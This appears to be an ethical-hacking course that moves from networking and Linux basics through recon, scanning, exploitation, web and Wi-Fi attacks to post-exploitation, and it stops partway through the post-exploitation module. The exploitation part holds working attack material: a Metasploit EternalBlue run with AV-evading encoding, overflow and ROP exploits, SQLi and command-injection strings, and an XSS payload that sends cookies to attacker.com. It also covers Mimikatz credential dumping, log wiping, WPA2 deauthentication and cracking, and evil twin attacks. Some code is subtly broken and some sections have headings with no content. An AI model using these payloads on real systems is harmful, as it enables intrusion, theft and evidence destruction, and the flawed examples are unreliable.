Network Basics for Ethical Hackers

Why Network Knowledge is Critical for Hacking

Almost every attack starts with understanding how networks communicate. As an ethical hacker, you must master networking concepts to identify vulnerabilities, map targets, and execute attacks safely.

Networks are the highways of the digital world — and understanding how data travels across them gives you the ability to intercept, redirect, or block it. Whether you're sniffing packets, exploiting misconfigured services, or pivoting through a compromised host, every technique builds on a solid foundation of networking knowledge.

1. OSI Model vs TCP/IP Model

The OSI (Open Systems Interconnection) model is a conceptual framework that standardizes how different network protocols interact. The TCP/IP model is the practical implementation used on the modern internet. As a hacker, you'll think in terms of both — understanding which layer an attack targets is essential for diagnosis and exploitation.

Hacker's Perspective on the OSI Model

• Layer 7 (Application) — SQL injection, XSS, directory traversal, API abuse
• Layer 4 (Transport) — Port scanning, SYN floods, session hijacking
• Layer 3 (Network) — IP spoofing, ICMP attacks, route manipulation
• Layer 2 (Data Link) — ARP poisoning, MAC flooding, VLAN hopping
• Layer 1 (Physical) — Cable tapping, rogue access points, hardware implants

2. IP Addressing

Every device on a network is identified by an IP address. IPv4 uses 32-bit addresses (e.g., 192.168.1.1) while IPv6 uses 128-bit addresses. Understanding subnetting is critical — it tells you the size of a network and which hosts are reachable without routing.

ip addr show          # Linux
ipconfig              # Windows

# Example IPv4: 192.168.1.105/24
# Example IPv6: 2001:db8::1/64

Public vs Private IPs

• Private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 — not routable on the internet
• Public: Routable on the internet, assigned by ISPs
• Loopback: 127.0.0.1 — refers to the local machine itself
• APIPA: 169.254.x.x — auto-assigned when DHCP fails (a red flag in recon)

Subnetting Quick Reference

• /24 — 256 addresses, 254 usable (most common home/office network)
• /16 — 65,536 addresses (large corporate networks)
• /8 — 16 million addresses (ISP-level blocks)
• /32 — A single host (used in firewall rules and routing)

# Install ipcalc on Kali
sudo apt install ipcalc -y

# Calculate subnet info
ipcalc 192.168.1.0/24

# Output shows: Network, Broadcast, HostMin, HostMax, Hosts/Net

3. TCP vs UDP

TCP (Transmission Control Protocol) establishes a reliable connection using a 3-way handshake (SYN → SYN-ACK → ACK) before any data is transferred. UDP (User Datagram Protocol) sends data without establishing a connection — faster but unreliable. Understanding this distinction directly impacts how you scan ports and craft exploits.

The TCP 3-Way Handshake

Understanding the handshake is critical for port scanning techniques like Nmap's SYN scan (-sS), which sends a SYN and never completes the handshake — making it stealthier than a full connect scan.

• SYN — Client says "I want to connect"
• SYN-ACK — Server says "OK, I'm listening"
• ACK — Client confirms "Connection established"
• RST — Port is closed (no service listening)
• No response / filtered — Firewall is likely blocking the port

4. DNS — The Internet's Phone Book

DNS (Domain Name System) translates human-readable domain names like google.com into IP addresses. DNS is a goldmine for recon — misconfigured DNS servers can leak internal hostnames, mail servers, and subdomains.

# Basic DNS lookup
nslookup example.com

# Detailed query with dig
dig example.com ANY

# Attempt zone transfer (often misconfigured)
dig axfr @ns1.example.com example.com

# Find mail servers
dig example.com MX

# Reverse lookup (IP → hostname)
dig -x 93.184.216.34

Important DNS Record Types

• A — Maps domain to IPv4 address
• AAAA — Maps domain to IPv6 address
• MX — Mail server for the domain
• NS — Authoritative name servers
• CNAME — Alias pointing to another domain
• TXT — Text records (SPF, DKIM, verification tokens — great for recon)
• PTR — Reverse DNS lookup record

5. Common Ports You Must Know

Memorizing key ports helps you instantly recognize what services are running when you see Nmap scan results. Open ports are potential entry points — each one represents a service that may have vulnerabilities.

6. Essential Networking Tools

• ifconfig / ip addr — View and configure network interfaces
• ping — Test host reachability and measure latency via ICMP
• traceroute / tracert — Map the route packets take to a destination
• nslookup / dig — Perform DNS queries and enumerate records
• netstat / ss — View active connections and listening ports
• arp -a — View the ARP cache (MAC-to-IP mappings on the LAN)
• route / ip route — View and manipulate the routing table
• nc (netcat) — The "Swiss Army knife" — connect to ports, transfer files, open shells
• wireshark / tcpdump — Capture and analyze live network traffic
• nmap — Port scanning, OS detection, service version enumeration

# Connect to a port (banner grabbing)
nc -v 192.168.1.1 80

# Listen for incoming connection
nc -lvnp 4444

# Simple port scan with netcat
nc -zv 192.168.1.1 20-100

# Transfer a file (receiver first)
nc -lvnp 4444 > received_file.txt
nc 192.168.1.1 4444 < file_to_send.txt

# Capture all traffic on eth0
sudo tcpdump -i eth0

# Capture only HTTP traffic
sudo tcpdump -i eth0 port 80

# Save capture to file for Wireshark
sudo tcpdump -i eth0 -w capture.pcap

# Open in Wireshark
wireshark capture.pcap

7. ARP & MAC Addresses

ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local network. It operates at Layer 2 and has no built-in authentication — making it vulnerable to ARP poisoning / spoofing, a foundational technique in man-in-the-middle (MitM) attacks.

• MAC Address — 48-bit hardware identifier (e.g., AA:BB:CC:DD:EE:FF)
• ARP Request — "Who has 192.168.1.1? Tell 192.168.1.5"
• ARP Reply — "192.168.1.1 is at AA:BB:CC:DD:EE:FF"
• ARP Poisoning — Send fake ARP replies to redirect traffic through your machine

# View ARP cache
arp -a

# ARP scan the local network
sudo arp-scan --localnet

# ARP spoofing with arpspoof (dsniff package)
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

dig example.com A
dig example.com MX
dig example.com NS
dig example.com TXT
dig axfr @ns1.example.com example.com

# Connect to web server
nc -v example.com 80

# Then type the following and press Enter twice:
HEAD / HTTP/1.0

# Look for: Server:, X-Powered-By:, Set-Cookie: fields

Linux & Command Line Mastery for Hackers

Why Linux is Essential for Ethical Hacking

Linux dominates servers, cloud infrastructure, IoT devices, and cybersecurity tooling. Ethical hackers rely on Linux because it provides:

• Full control over the system (open-source kernel)
• Powerful command-line tools for automation
• Built-in networking and scripting capabilities
• Security-focused distributions like Kali Linux and Parrot OS

1. Linux File System Hierarchy

• / — Root directory (everything starts here)
• /home — User files
• /root — Root user home
• /etc — Configuration files
• /var — Logs and variable data
• /tmp — Temporary files
• /bin & /usr/bin — Executable commands
• /sbin — System binaries (admin commands)
• /dev — Device files
• /proc — Process and kernel info

2. Essential Commands Every Hacker Must Know

Navigation & File Management

pwd                    # Print Working Directory
ls -la                 # List files (detailed + hidden)
cd /etc                # Change directory
mkdir tools            # Create directory
touch test.txt         # Create empty file
cp file1 file2         # Copy
mv old new             # Move / Rename
rm -rf folder          # Remove (DANGEROUS)
find / -name "test"    # Find files

System Information & Processes

uname -a               # System info
whoami                 # Current user
id                     # User + group info
ps aux                 # Running processes
top / htop             # Live process monitor
kill PID               # Kill process
df -h                  # Disk usage
free -m                # Memory usage
uptime                 # System uptime

Networking Commands

ifconfig / ip addr     # Network interfaces
ping 8.8.8.8           # Test connectivity
netstat -tuln          # Open ports
ss -tuln               # Faster alternative
traceroute google.com  # Route tracking
curl example.com       # HTTP requests
wget url               # Download files

3. File Permissions & Ownership (CRITICAL)

Understanding permissions is key for both attacking and securing systems.

ls -l
chmod 755 file.sh
chmod +x script.sh
chown user:group file

• r (read) = 4
• w (write) = 2
• x (execute) = 1

Example: 755 = owner (rwx), group (rx), others (rx)

4. Text Processing Tools (Hacker’s Best Friends)

• cat — View file
• grep — Search patterns
• sed — Modify streams
• awk — Advanced processing
• cut / sort / uniq — Data filtering

cat /etc/passwd | grep bash
ps aux | grep apache
netstat -tuln | grep 80
cut -d: -f1 /etc/passwd
sort users.txt | uniq

5. Redirection & Pipes (Power Feature)

command > file.txt      # Overwrite output
command >> file.txt     # Append output
command 2> error.log    # Errors only
command1 | command2     # Pipe output

Chaining commands allows automation and complex data extraction—essential for reconnaissance.

6. Package Management

sudo apt update
sudo apt upgrade
sudo apt install nmap
sudo apt remove package

7. Kali Linux Specific Tools

• nmap — Network scanning
• metasploit — Exploitation
• burpsuite — Web testing
• wireshark — Packet analysis
• john / hashcat — Password cracking
• aircrack-ng — WiFi hacking

8. Basic Bash Scripting

#!/bin/bash
echo "User: $(whoami)"
echo "IP: $(hostname -I)"
echo "System: $(uname -a)"

Make executable:

chmod +x script.sh
./script.sh

Reconnaissance & Footprinting

What is Reconnaissance?

Reconnaissance (Recon) is the first and most critical phase of ethical hacking. It involves gathering intelligence about a target system, network, or organization. The goal is to build a complete attack surface map before any exploitation begins.

Types of Reconnaissance

Recon Workflow (Real-World)

1. Identify target scope (domains, IPs)
2. Gather passive intelligence (OSINT)
3. Enumerate subdomains
4. Discover live hosts
5. Scan ports and services
6. Identify technologies and vulnerabilities

1. Passive Reconnaissance Techniques

WHOIS Lookup

whois example.com
whois -h whois.iana.org example.com

Reveals domain owner, registrar, DNS servers, and registration dates.

Google Dorks (Advanced Search)

site:example.com filetype:pdf
inurl:admin site:example.com
intitle:"index of" "parent directory"
site:example.com ext:sql | ext:log

Shodan & Censys

Search engines that index internet-connected devices, open ports, and exposed services.

theHarvester (Email & Domain Info)

theHarvester -d example.com -b google
theHarvester -d example.com -b linkedin

2. Subdomain Enumeration (CRITICAL)

Subdomains often expose hidden services and entry points.

sublist3r -d example.com
amass enum -d example.com
assetfinder example.com

Validate live subdomains:

cat subs.txt | httpx

3. Active Reconnaissance

Host Discovery

ping -c 4 target.com
nmap -sn 192.168.1.0/24        # Ping sweep

Port Scanning with Nmap

nmap -sV -O target.com            # Service + OS detection
nmap -sS -p- target.com           # Full port scan
nmap -sC -sV -A target.com        # Aggressive scan
nmap -oX scan.xml target.com      # Save XML output

Service Enumeration

nmap -sV --script=banner target.com
nmap --script vuln target.com

4. DNS Reconnaissance

dig example.com ANY
dig mx example.com
dnsenum example.com
dnsrecon -d example.com -t std

Look for:

• Mail servers (MX records)
• Subdomains
• Zone transfer misconfigurations

5. Web Application Recon

whatweb example.com
wappalyzer
nikto -h example.com
gobuster dir -u http://example.com -w wordlist.txt

Identify:

• Technologies (PHP, Apache, WordPress)
• Hidden directories
• Outdated software

6. OSINT Framework

• People search: LinkedIn, Pipl
• Email discovery: Hunter.io
• Leaks & breaches: HaveIBeenPwned
• Metadata extraction: exiftool

7. Automation & Recon Pipelines

sublist3r -d example.com > subs.txt
cat subs.txt | httpx > live.txt
nmap -iL live.txt -sV -oA results

8. Documentation & Reporting

Always document findings:

• Discovered domains and IPs
• Open ports and services
• Potential vulnerabilities
• Screenshots and logs

Scanning & Enumeration

Introduction to Scanning

Scanning is the phase where an attacker or ethical hacker actively interacts with a target to identify live systems, open ports, running services, and possible entry points.

It comes after reconnaissance and before exploitation. At this stage, you are no longer guessing — you are verifying.

1. Host Discovery (Finding Live Targets)

Before scanning ports, you need to know which machines are alive. This avoids wasting time scanning offline systems.

nmap -sn 192.168.1.0/24              # Ping sweep (no port scan)
nmap -PE -PP -PM target.com          # Different ICMP probes
masscan -p80,443 192.168.1.0/24 --rate=1000

Explanation

• -sn → Host discovery only (no ports scanned)
• -PE → ICMP echo (like ping)
• -PP → Timestamp request
• -PM → Netmask request

Example Output

Nmap scan report for 192.168.1.10
Host is up (0.0030s latency)

This confirms the machine is reachable and worth scanning further.

2. Port Scanning Techniques

Ports are entry points into a system. Each open port usually corresponds to a service.

Example

nmap -sS -p 22,80,443 target.com

Sample Output Explained

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

• open → Service is accessible
• closed → No service
• filtered → Firewall blocking

3. Advanced Nmap Usage

Combine multiple flags for deeper insights:

nmap -sS -sV -O -T4 target.com
nmap -A target.com
nmap -sC --script vuln target.com
nmap -p- target.com                  # Scan ALL ports (1–65535)

Flag Breakdown

• -O → OS detection
• -T4 → Faster scan
• -sC → Default scripts
• --script vuln → Vulnerability detection

Example Insight

If Nmap shows:

80/tcp open http Apache httpd 2.4.49

You now know:
• Web server is Apache
• Version is 2.4.49
→ You can search for known vulnerabilities for that version

4. Enumeration (Deep Information Gathering)

Enumeration goes beyond scanning. It extracts detailed information such as: users, shares, directories, and configurations.

SMB Enumeration

enum4linux -a target.com
smbclient -L //target.com

Finds shared folders, users, and permissions.

SNMP Enumeration

snmpwalk -c public -v1 target.com

Can reveal system processes, network info, and configs.

Web Enumeration

gobuster dir -u http://target.com -w wordlist.txt
dirb http://target.com
nikto -h http://target.com

Example Output

/admin (Status: 200)
/login (Status: 200)
/backup (Status: 403)

These hidden paths often contain login panels, backups, or sensitive data.

5. Common Services & What to Check

• SSH (22) → Weak passwords, outdated versions
• HTTP (80) → Directories, forms, vulnerabilities
• FTP (21) → Anonymous login
• SMB (445) → Shared files, misconfigurations

6. Organizing Results

mkdir recon
mkdir scans
nmap -oA scans/full_scan target.com

Always keep results structured for reporting and later analysis.

7. Best Practices & OPSEC

• Use slower scans (-T2) to avoid detection
• Avoid scanning during peak hours
• Rotate IPs (advanced)
• Stay strictly within scope

Vulnerability Analysis

What is Vulnerability Analysis?

Vulnerability Analysis is the process of identifying, validating, and prioritizing security weaknesses in a system. It transforms raw scan data into actionable findings.

At this stage, you answer:
• Is this vulnerability real?
• How severe is it?
• Can it be exploited?

Types of Vulnerabilities

1. Vulnerability Analysis Workflow

1. Collect scan results (Nmap, Nikto, etc.)
2. Identify services and versions
3. Search for known vulnerabilities (CVE)
4. Validate manually (avoid false positives)
5. Prioritize based on severity and impact

2. Automated Vulnerability Scanners

Automated tools quickly identify known issues, but must be verified.

• Nessus / OpenVAS — Full vulnerability scanning
• Nikto — Web server weaknesses
• SQLMap — Detects SQL injection
• Nmap NSE — Script-based detection

openvas-start
nikto -h http://target.com
sqlmap -u "http://target.com/page.php?id=1" --dbs
nmap --script vuln target.com

Example Output (Nikto)

+ Server: Apache/2.4.49
+ Retrieved x-powered-by header: PHP/7.3
+ OSVDB-3092: /admin/: This might be interesting

Interpretation:
• Apache version may be vulnerable
• PHP version is outdated
• Hidden admin panel discovered

3. Manual Vulnerability Analysis (CRITICAL)

This is where real hackers stand out.

• Verify scanner results manually
• Check service versions from Nmap
• Search for exploits using CVE IDs
• Test behavior (not just trust tools)

Using Searchsploit

searchsploit apache 2.4.49
searchsploit vsftpd

Example

If Nmap shows:

Apache httpd 2.4.49

You search:

searchsploit apache 2.4.49

→ You may find a known Remote Code Execution (RCE) exploit.

4. CVE & Vulnerability Databases

Common Vulnerabilities and Exposures (CVE) provide standardized IDs.

• CVE-2021-44228 → Log4Shell
• CVE-2017-0144 → EternalBlue

Use databases:

• NVD (National Vulnerability Database)
• Exploit-DB
• GitHub (public PoCs)

5. Vulnerability Scoring — CVSS

CVSS measures severity from 0 to 10.

• Critical (9.0–10) → Immediate action required
• High (7.0–8.9) → Serious risk
• Medium (4.0–6.9) → Moderate impact
• Low (0.1–3.9) → Minor risk

Example

A Remote Code Execution vulnerability with no authentication → CVSS score ≈ 9.8 (Critical)

6. False Positives & Validation

Automated tools often report vulnerabilities that are not exploitable.

• Service version mismatch
• Patched but still reported
• Configuration blocks exploit

7. Exploitation Preparation

Once a vulnerability is confirmed:

• Search for public exploits
• Use Metasploit modules
• Prepare payloads
• Understand impact before exploitation

msfconsole
search apache
use exploit/multi/http/apache_rce
set RHOST target.com
run

8. Prioritization (Real-World Thinking)

Not all vulnerabilities matter equally.

• Is it exploitable remotely?
• Does it require authentication?
• What is the business impact?
• Is sensitive data exposed?

9. Reporting Findings

A good vulnerability report includes:

• Description of vulnerability
• Affected system
• Severity (CVSS)
• Proof of Concept (PoC)
• Remediation steps

Example Finding

Title: Apache 2.4.49 RCE
Severity: Critical (9.8)
Impact: Remote code execution
Fix: Upgrade to latest version

Exploitation Techniques

1️⃣ What is Exploitation?

Exploitation is the act of converting a discovered vulnerability into a concrete foothold on a target system. In the ethical hacking workflow it follows:

1. Reconnaissance →
2. Vulnerability research →
3. Exploitation →
4. Post‑exploitation →
5. Reporting

It is the most legally sensitive phase—any execution of code on a system without explicit, written permission is a crime in practically every jurisdiction.

2️⃣ Types of Exploits (Expanded)

3️⃣ Exploit Development Lifecycle

The diagram emphasizes that exploitation does not happen in isolation; each stage feeds back into the previous one. Understanding the entire pipeline helps you design more reliable (and stealthier) exploits.

4️⃣ Using the Metasploit Framework (Detailed Walk‑through)

Below is an end‑to‑end example that exploits the EternalBlue (MS17‑010) vulnerability on a vulnerable Windows 7 host. The steps are annotated to highlight common pitfalls and safe‑practice recommendations.

# 1️⃣ Launch Metasploit
msfconsole

# 2️⃣ Search for the appropriate exploit module
search ms17_010

# 3️⃣ Load the module (use the fully‑qualified path)
use exploit/windows/smb/ms17_010_eternalblue

# 4️⃣ Set the target’s address (RHOSTS)
set RHOSTS 192.168.1.45

# 5️⃣ Choose a payload – Meterpreter staged reverse TCP
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 6️⃣ Set the listener address (your Kali/Attacker IP)
set LHOST 192.168.1.10

# 7️⃣ Verify all required options are set
show options

# 8️⃣ (Optional) Bypass AV signatures with encoding
set ENCODER x86/shikata_ga_nai
set EXITFUNC thread

# 9️⃣ Launch the exploit
exploit -j   # running in a job lets you keep the console free

# 10️⃣ You should now have a Meterpreter session.
sessions -i 1   # interact with the first session

Pro‑Tip: Use setg to set global variables (e.g., LHOST) before loading many exploits; this saves typing on each module.

5️⃣ Common Exploitation Techniques (Deep Dive)

5.1 Buffer Overflow Exploitation

Three variants are most relevant to modern systems:

1. Stack‑based overflow – overwrites the saved return address.
2. Heap‑based overflow – corrupts heap metadata (e.g., malloc chunks).
3. Format‑string abuse – exploits unchecked printf‑style functions.

Below is a minimal 64‑bit Linux “stack buffer overflow” PoC using pwntools:

#!/usr/bin/env python3
from pwn import *

# -------------------------------------------------
# Target binary – compiled with -fno-stack-protector -z execstack
# -------------------------------------------------
binary = "./vuln"
elf    = ELF(binary)

# -------------------------------------------------
# Offset to RIP (64‑bit) – discovered via cyclic pattern
# -------------------------------------------------
offset =  cyclic_find(b"kaaaiaaa")   #  cyclic_find(“kaaaiaaa”) → 72

# -------------------------------------------------
# Payload: NOP sled + shellcode + overwrite RIP
# -------------------------------------------------
shell = asm(shellcraft.sh())
payload = b"A" * offset
payload += p64(elf.sym["main"])   # re‑enter main after shellcode (optional)
payload = payload.ljust(112, b"\x90")   # NOP sled
payload += shell

io = process(binary)
io.sendlineafter(b"> ", payload)
io.interactive()

Key take‑aways:

• ASLR – disable echo 0 > /proc/sys/kernel/randomize_va_space on test VMs, or brute‑force with ret2dlresolve tricks.
• DEP/NX – bypass with mprotect ROP chain or use execstack for learning.
• Canaries – leak the canary via format‑string or side‑channel before overflow.

5.2 Return‑Oriented Programming (ROP)

When DEP blocks executable stack, the attacker chains together existing gadgets ending in ret. A concise one‑gadget (e.g., one_gadget) can replace an entire ROP chain on glibc 2.31.

; Example: execve("/bin/sh", NULL, NULL)
; Assume we have a writable .bss section at 0x601800

; 1. Write "/bin/sh" into .bss
pop rdi ; ret      ; 0x400123
0x601800           ; address to write
pop rsi ; ret      ; 0x400456
0x0068732f2f6e6962 ; "/bin/sh"
mov [rdi], rsi ; ret ; 0x400789

; 2. Set registers for execve
pop rdi ; ret      ; 0x400123
0x601800           ; pointer to "/bin/sh"
xor rsi, rsi ; ret ; 0x400456   (rsi = 0)
xor rdx, rdx ; ret ; 0x400789   (rdx = 0)
pop rax ; ret      ; 0x400abc
0x3b                ; syscall number for execve
syscall ; ret      ; 0x400def

Tools for gadget hunting:

• rp++ – fast automated gadget extraction.
• ROPgadget – classic, works on Windows PE binaries too.
• Online GTFOBins – useful for privilege escalation gadgets.

5.3 Use‑After‑Free (UaF) Exploits

A UaF occurs when an attacker causes the application to free a heap object and then reuses the dangling pointer. Modern browsers and the Linux kernel frequently disallow simple UaF exploitation, but tcache poisoning (glibc 2.27+) and front‑ending techniques (JIT spraying) still make it viable.

Typical exploitation steps:

1. Trigger a free of an object you control (often a heap‑allocated struct).
2. Allocate a new object of the same size with attacker‑controlled data.
3. Manipulate a function pointer (e.g., __free_hook) to point at shellcode or a ROP chain.

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    void (*callback)(void);
    char  data[64];
} obj_t;

void secret(void) {
    system("/bin/sh");
}

int main() {
    obj_t *a = malloc(sizeof(obj_t));
    obj_t *b = malloc(sizeof(obj_t));

    a->callback = NULL;
    strcpy(a->data, "A safe string");
    free(a);               // <--- free

    // *** Attack ***
    // b occupies same heap slot as a, and we overflow b->data
    // writing 8‑bytes beyond b->data to overwrite a->callback:
    memset(b->data, 'A', 72);  // overflow by 8 bytes
    memcpy(b->data + 72, &secret, sizeof(void*));

    // a is dangling but still reachable
    a->callback();         // executes secret()
    return 0;
}

On modern hardened binaries this would be blocked by RELRO (Read‑Only Relocations) unless -z relro is disabled. The exercise is to explore the effect of each hardening flag.

5.4 Web‑Application Exploits (SQLi, XSS, RCE)

SQL Injection – Advanced Payload

/* Blind Boolean‑Based SQLi – time delay payload */
' OR IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97,SLEEP(5),0)--

This payload checks the first character of the admin password and forces the server to pause for 5 seconds if it matches 'a' (ASCII 97). By iterating over characters you can reconstruct the secret.

Cross‑Site Scripting – Bypass CSP

<svg/onload='fetch("https://attacker.com/steal?c="+document.cookie)'>

Even when a strict Content‑Security‑Policy (CSP) is set, a svg element with an onload handler can be an effective XSS vector in legacy browsers.

File Inclusion – LFI → RCE

Chaining a local file inclusion with php://filter and zip:// wrappers can lead to remote code execution:

?file=php://filter/convert.base64-decode/resource=../../../../etc/passwd
?file=zip://shell.zip#shell.php   // if a writable upload directory exists

6️⃣ Payload Types – Classification & Practical Usage

When dealing with a target that runs Windows Exploit Protection (DEP, ASLR, CFG), your payload selection must adapt accordingly (e.g., use msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai with the -b "\x00" option to avoid null‑bytes).

7️⃣ Post‑Exploitation – Advanced Techniques & Toolset

Credential Dumping & Lateral Movement

• Mimikatz – privilege::debug, sekurlsa::logonpasswords, kerberos::list.
  Tip: Use mimi (Cobalt Strike’s built‑in mimikatz) for stealth – it injects via reflective DLL.
• LaZagne – pulls credentials from browsers, Wi‑Fi, stored passwords.
• SecretsDump.py (Impacket) – remote NTLM hash extraction via SMB.

Token Impersonation & Pass‑the‑Hash/Ticket

• incognito (PowerShell) – creates new tokens from dumped hashes.
• psexec.py (Impacket) – classic Pass‑the‑Hash for SMB.
• kekeo – Kerberoasting, extracting service tickets for cracking.

Privilege Escalation (Windows)

Persistence Mechanisms

• Registry Run Keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
• Scheduled Tasks (schtasks /create) – with hidden XML.
• Service creation (sc create) with binary planted in %APPDATA%.
• Web Shells / Backdoors on compromised web servers (e.g., c99shell, php-reverse-shell).

Cleanup & Anti‑Forensics

• Clear Windows Event Logs: wevtutil cl Security
• Delete Bash history (history -c) and .bash_history file.
• Overwrite files using dd if=/dev/zero of=tmpfile bs=1M count=10 conv=notrunc before deletion.
• Remove evidence of Metasploit sessions: sessions -K and rm -f /tmp/meterpreter*.

8️⃣ Legal & Ethical Considerations

9️⃣ Real‑World Exploit Case Studies

10️⃣ Exploit Landscape – Statistics & Trends (2022‑2024)

Key observations:

• ≈ 30 % of CVEs get a public exploit within 60 days of disclosure – MITRE CVE data.
• RCE remains the top‑ranked CVSS vector (44 % of critical CVEs).
• Exploitation of cloud mis‑configurations (S3 buckets, Azure storage) grew > 250 % YoY (Shodan “cloud‑exposed” dataset).

For a visual representation, see the (placeholder) SVG chart below. In a production LMS you could replace it with a Chart.js interactive chart.

11️⃣ Cheat‑Sheet – Exploitation Quick Reference

# Set a global variable (applies to all modules)
setg LHOST 10.0.0.5

# Show all options for a module
show options

# Check for a module’s prerequisites
check

# Background a session after a successful exploit
exploit -j -z   # -j = job, -z = background

# List all open sessions
sessions -l

# Interact with a specific session
sessions -i 2

from pwn import *
io = remote('target', 1337)
payload = b'A'*72 + p64(0xdeadbeef)   # overwrite RIP
io.sendline(payload)
io.interactive()

# Dump NTLM hashes from a remote Windows host
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -hashes : user@target

# Execute a command via SMB
python3 /usr/share/doc/python3-impacket/examples/psexec.py user:pass@target cmd.exe

12️⃣ Knowledge‑Check Quiz (5 questions)

13️⃣ Further Reading & Resources

• Books
  • The Shellcoder’s Handbook – Chris Anley et al.
  • Practical Binary Analysis – Dennis Andriesse.
  • Windows Kernel Exploitation – Alex Ionescu.
  • Web Application Hackers Handbook – Dafydd Stuttard & Marcus Pinto.
• Online Platforms
  • Offensive Security – PWK/OSCP labs.
  • Hack The Box – “Pro Labs” for advanced exploitation.
  • TryHackMe – “Red Team Path” and “Windows Exploitation” rooms.
  • Exploit‑DB – searchable database of public exploits.
• Tools & Frameworks
  • Metasploit Framework – GitHub.
  • Cobalt Strike – commercial red‑team platform (offers Beacon payloads).
  • Immunity CANVAS – commercial exploitation suite.
  • Ghidra / IDA Pro – binary analysis for custom exploit development.
  • pwntools – Python library for rapid exploit prototyping.
  • radare2 – open‑source reverse‑engineering framework.
  • Burp Suite Pro – Intruder/Repeater for web‑app exploitation.
• Research & CVE Feeds
  • National Vulnerability Database (NVD) – nvd.nist.gov
  • CVE Details – cvedetails.com
  • Zero Day Initiative (ZDI) – zerodayinitiative.com
  • GitHub Security Advisories – github.com/advisories

14️⃣ Lab Exercises (Extended)

Web Application Security

Why Web Apps Are Prime Targets

Web applications are exposed to the internet, process user input, and often connect to databases and internal systems. This makes them a high-value target for attackers.

• Accessible from anywhere
• Handle sensitive data (logins, payments)
• Complex logic → more chances of bugs

1. OWASP Top 10 (2021)

2. Understanding HTTP (CRITICAL)

You must understand how web apps communicate.

GET /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=abc123

Key Components

• Headers → metadata
• Cookies → session tracking
• Parameters → user input (attack surface)

3. SQL Injection (Deep Dive)

Occurs when user input is directly used in SQL queries.

' OR '1'='1' --
1 UNION SELECT username,password FROM users --

Attack Flow

1. Find input field (login/search)
2. Inject payload
3. Observe response changes
4. Extract data

Example

username=admin' OR '1'='1
password=anything

→ Bypasses login authentication

Automated Testing

sqlmap -u "http://target.com/login.php?id=1" --dbs

4. Cross-Site Scripting (XSS)

Injecting JavaScript into a web page.

<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>

Types

• Stored → Saved on server
• Reflected → Immediate response
• DOM-based → Client-side only

Impact

• Session hijacking
• Credential theft
• Defacing websites

5. Command Injection

Occurs when user input is passed to system commands.

; ls -la
| whoami
&& cat /etc/passwd

Example

If input is:

ping 127.0.0.1; whoami

→ Executes extra command on server

6. Authentication & Session Attacks

• Weak passwords
• No rate limiting (brute force)
• Session fixation
• Session hijacking

Set-Cookie: session=abc123

If stolen → attacker becomes user.

7. Directory & Endpoint Discovery

gobuster dir -u http://target.com -w wordlist.txt
ffuf -u http://target.com/FUZZ -w wordlist.txt

Find hidden:

• /admin
• /backup
• /api

8. API Security Testing

Modern apps rely heavily on APIs.

GET /api/users/1
Authorization: Bearer token

Common Issues

• IDOR (Insecure Direct Object Reference)
• Missing authentication
• Rate limiting issues

9. Testing Tools (Professional Stack)

• Burp Suite — Intercept & modify requests
• OWASP ZAP — Automated scanning
• SQLMap — SQL injection
• FFUF — Fast fuzzing
• Postman — API testing

10. Secure Development Practices

• Input validation & sanitization
• Use prepared statements
• Implement authentication controls
• Use HTTPS everywhere
• Apply Content Security Policy (CSP)

Wireless & Mobile Hacking (Practical Lab)

⚠️ Lab Setup (IMPORTANT)

This is a hands-on module. You MUST use:

• Your own Wi-Fi network OR lab environment
• Kali Linux (or similar)
• USB Wi-Fi adapter that supports monitor mode

1. Wi-Fi Hacking Fundamentals (Practical Understanding)

What You Are Actually Attacking

In Wi-Fi attacks, you are NOT directly "hacking the router". You are attacking:

• Authentication process (handshake)
• Weak passwords
• Misconfigured features (WPS)

2. Lab 1 — Monitor Mode & Network Discovery

Step 1: Enable Monitor Mode

airmon-ng check kill
airmon-ng start wlan0

Result: wlan0 → wlan0mon

Step 2: Scan Networks

airodump-ng wlan0mon

What to Look For

• BSSID → Router MAC
• Channel → Important for targeting
• ENC → WPA2 / WPA3
• Clients → Connected devices

Example Output

BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:FF  6   WPA2  MyWiFi

3. Lab 2 — Capturing WPA2 Handshake

Step 1: Lock onto Target

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Step 2: Force Reconnection (Deauth)

aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

This forces devices to reconnect → handshake is captured.

Success Indicator

"WPA handshake: AA:BB:CC..."

4. Lab 3 — Cracking WPA2 Password

aircrack-ng capture.cap -w rockyou.txt

What Happens

• Tool compares handshake against wordlist
• If password is weak → cracked
• If strong → attack fails

Example Result

KEY FOUND! [ password123 ]

5. Lab 4 — WPS Attack (Fast Method)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

WPS uses a PIN → easier to brute-force than passwords.

6. Evil Twin Attack (Concept + Practical)

Create a fake Wi-Fi with same name → trick users.

wifiphisher

Attack Flow

1. Create fake AP
2. Disconnect real users
3. Victim connects to fake AP
4. Capture credentials

7. Mobile Hacking (Practical Basics)

Android APK Analysis

apktool d app.apk
jadx-gui app.apk

What to Look For

• Hardcoded passwords
• API keys
• Hidden endpoints

Dynamic Testing (Runtime)

adb devices
adb shell
frida -U -n app

Allows you to inspect and manipulate app behavior live.

8. Bluetooth Attacks (Practical Awareness)

hcitool scan
bluetoothctl

Example

• Discover nearby devices
• Attempt pairing attacks

9. Common Mistakes Beginners Make

• No monitor mode support → nothing works
• Trying WPA3 → usually not crackable
• No clients → no handshake
• Weak wordlists → no success

10. Defense (VERY IMPORTANT)

• Use WPA3 or strong WPA2 passwords
• Disable WPS
• Use hidden SSID (basic protection)
• Enable MAC filtering (limited security)
• Monitor connected devices

Post-Exploitation & Persistence (Practical Lab)

⚠️ Lab Context

You already have access (shell or Meterpreter). Now your job is to:

• Understand the system
• Escalate privileges
